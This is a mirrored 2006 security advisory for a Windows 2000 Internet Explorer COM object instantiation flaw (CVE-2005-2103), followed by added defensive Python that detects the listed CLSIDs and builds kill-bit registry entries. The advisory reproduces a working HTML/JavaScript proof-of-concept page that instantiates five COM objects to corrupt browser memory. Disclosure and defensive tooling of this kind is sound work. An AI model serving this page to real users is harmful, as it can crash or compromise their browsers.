Windows 2000 Multiple COM Object Instantiation Vulnerability

CVE: CVE-2005-2103
Category: CWE-264
Price: N/A
Severity: High
Author: Yaniv Miron, Aviram Jenik
Risk: High
Exploitation Type: Local
Date: 2006-09-05
CPE: cpe:cpe:/o:microsoft:windows_2000
PURL:
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006090002

Below is a copy:

Advisory ID:
XSec-06-08

Advisory Name:
Windows 2000 Multiple COM Object Instantiation Vulnerability

Release Date:
08/21/2006

Tested on:
Windows 2000/Internet Explorer 6.0 SP1

Affected version:
Windows 2000

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
Multiple vulnerabilities have been found in Windows 2000. When Internet Explorer tries to instantiate the ciodm.dll, MyInfo.dll, msdxm.ocx, or Creator.dll (Media player 9) COM objects as ActiveX controls, it may corrupt system memory in such a way that an attacker may cause a DoS and could possibly execute arbitrary code.

Exploit:
=============== 2000obj.htm start ================

<!--

// Windows 2000 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000 SP4 CN

// http://www.xsec.org
// nop (nop#xsec.org)

-->
<html>
<head>
<title>COM-tester</title>
</head>
<body>
<script>
var i = 0;
var clsid = new Array(

// NO: 1
// CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}
// Info: Microsoft Index Server Catalog Administration Object
// ProgID: Microsoft.ISCatAdm.1
// InprocServer32: C:\WINNT\system32\ciodm.dll
"{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",

// NO: 2
// CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9}
// Info: MyInfo ASP Component
// ProgID: MSWC.MyInfo.1
// InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll
"{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",

// NO: 3
// CLSID: {8E71888A-423F-11D2-876E-00A0C9082467}
// Info: RadioServer Class
// ProgID: Mmedia.RadioServer.1
// InprocServer32: C:\WINNT\system32\msdxm.ocx
"{8E71888A-423F-11D2-876E-00A0C9082467}",

// NO: 4 media player?
// CLSID: {606EF130-9852-11D3-97C6-0060084856D4}
// Info: CdCreator Class
// ProgID: Creator.CdCreator.1
// InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll
"{606EF130-9852-11D3-97C6-0060084856D4}",

// NO: 5 media player?
// CLSID: {F849164D-9863-11D3-97C6-0060084856D4}
// Info: CdDevice Class
// ProgID: Creator.CdDevice.1
// InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll
"{F849164D-9863-11D3-97C6-0060084856D4}",

// END
null
);

// Walk the list until the null terminator; each pass creates an <object>
// element and assigns the next CLSID as its classid.
while (clsid[i])
{
    var a = document.createElement("object");

    window.status = "Testing Object " + clsid[i] + "...";

    a.setAttribute("classid", "clsid:" + clsid[i]);

    i++;
}

// Reached only if the loop completed without the browser crashing.
window.status = "failed!";

</script>
</body>
</html>

=============== 2000obj.htm end ==================

Link:
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16

About XSec:
We are redhat.
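
For defenders, the CLSIDs and ProgIDs listed in the proof-of-concept above can serve as content-inspection indicators and as input for the Internet Explorer kill bit. The Python code below is an added example, not part of the XSec advisory: it flags page source that references any of the five classes and builds the matching kill-bit `.reg` file. The function names and the sample page are constructed for illustration, and the kill bit (`Compatibility Flags` = 0x400 under `ActiveX Compatibility`) is the standard IE mechanism for blocking a control, not a fix the advisory itself names.

```python
import re

# CLSID -> (ProgID, in-process server), copied from the advisory's proof-of-concept.
COM_OBJECTS = {
    "3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D": ("Microsoft.ISCatAdm.1", "ciodm.dll"),
    "4682C82A-B2FF-11D0-95A8-00A0C92B77A9": ("MSWC.MyInfo.1", "MyInfo.dll"),
    "8E71888A-423F-11D2-876E-00A0C9082467": ("Mmedia.RadioServer.1", "msdxm.ocx"),
    "606EF130-9852-11D3-97C6-0060084856D4": ("Creator.CdCreator.1", "creator.dll"),
    "F849164D-9863-11D3-97C6-0060084856D4": ("Creator.CdDevice.1", "creator.dll"),
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
KILL_BIT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
                r"\ActiveX Compatibility")

# Constructed sample page (not from the advisory): lower-case GUID, an
# unrelated GUID that must be ignored, and a ProgID string.
SAMPLE = '''<script>
var ids = ["{3bc4f3a3-652a-11d1-b4d4-00c04fc2db8d}", "{00000000-0000-0000-0000-000000000000}"];
var name = "Creator.CdDevice.1";
</script>'''


def find_listed_objects(page_source):
    """Return the advisory CLSIDs a page references, by GUID or by ProgID.

    GUIDs are matched anywhere in the text, in any case, because the PoC keeps
    them in a script array and prepends "clsid:" only at run time.
    """
    hits = {g.upper() for g in GUID_RE.findall(page_source)} & set(COM_OBJECTS)
    lowered = page_source.lower()
    for clsid, (progid, _dll) in COM_OBJECTS.items():
        # Drop the version suffix so "Creator.CdDevice" matches as well.
        if progid.rsplit(".", 1)[0].lower() in lowered:
            hits.add(clsid)
    return sorted(hits)


def kill_bit_reg(clsids):
    """Build .reg text that sets the IE kill bit for each CLSID."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        lines += [f"[{KILL_BIT_KEY}\\{{{clsid}}}]",
                  '"Compatibility Flags"=dword:00000400', ""]
    return "\r\n".join(lines)


if __name__ == "__main__":
    found = find_listed_objects(SAMPLE)
    print([(c,) + COM_OBJECTS[c] for c in found])
    print(kill_bit_reg(found))
```

ProgID matching is a plain substring test, so treat a ProgID-only hit as a lead to review rather than a confirmed instantiation.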
